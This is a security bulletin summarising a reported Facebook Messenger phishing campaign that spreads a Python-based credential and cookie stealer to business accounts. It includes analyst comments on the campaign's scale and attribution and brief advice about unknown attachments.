Cyber Security Threat Summary:
Hackers use a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages to target Facebook business accounts with password-stealing malware. The attackers trick the targets into downloading a RAR/ZIP archive containing a downloader for an evasive Python-based stealer that grabs cookies and passwords stored in the victim's browser. In a new report by Guardio Labs, researchers warn that roughly one out of seventy targeted accounts is ultimately compromised, translating to massive financial losses. The hackers start by sending Messenger phishing messages to Facebook business accounts pretending to be copyright violations or requests for more information about a product. The attached archive contains a batch file that, if executed, fetches a malware dropper from GitHub repositories to evade blocklists and minimize distinctive traces. Along with the payload (project[.]py), the batch script also fetches a standalone Python environment required by the infostealing malware and adds persistence by setting the stealer binary to execute at system startup. The project[.]py file features five layers of obfuscation, making it challenging for AV engines to catch the threat. Finally, the stealer wipes all cookies from the victim's device to log them out of their accounts, giving the scammers enough time to hijack the newly compromised account by changing the passwords” (Bleeping Computer, 2023).

Security Officer Comments:
Researchers at Guardio Labs observed an overwhelming 100,000 phishing messages being sent out per week, with targets residing in North America, Europe, Australia, Japan, and Southeast Asia. The exact number of hijacked accounts is unclear as some users may have yet to execute the batch file, which is required for a successful infection. However, according to Guardio Labs, approximately 7% of all of Facebook’s business accounts have been targeted in this latest campaign, .4% of which have downloaded the malicious archive.

Guardio Labs is attributing this campaign to Vietnamese hackers based on strings in the malware and the use of ‘Coc Coc’ which is a very popular web browser in Vietnam. Similar phishing attacks have been launched in the past with Facebook disrupting a Vietnam-originated campaign in May 2023, that used a new info-stealing malware dubbed ‘NodeStealer’ to extract browser cookies.

Suggested Correction(s):
With phishing being the initial attack vector for this campaign, users should be cautious when opening links or attachments that come from unknown senders. Guardio Labs has also published some IOCs which can be used for detection purposes:

Link(s):
https://www.bleepingcomputer.com/
https://labs.guard.io/